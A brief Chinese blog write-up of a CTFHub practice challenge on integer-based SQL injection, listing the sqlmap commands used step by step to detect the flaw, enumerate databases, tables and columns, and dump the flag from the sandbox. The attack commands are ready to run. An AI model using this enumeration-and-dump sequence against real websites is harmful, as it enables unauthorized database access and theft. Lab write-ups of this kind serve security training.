CTFHUB WEB-SQL注入-整数型注入

1.题目

2.使用的环境及工具

环境：kail linux

工具：sqlmap

3.操作步骤

本题是基于sql的注入，首先考虑sqlmap，先查看这个sql是否存在注入

~~~sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1

检查一下全部数据库内容

sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1 --dbs

返回值有四个，但是除了sqli，其他都是配置，所以重点在sqli上

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

发现表了之后访问sqli的所有列

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

最后读取flag的值

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

posted @ 2022-10-22 11:33 WuliweiT 阅读(69) 评论(0) 编辑收藏举报

刷新页面返回顶部

WuliweiT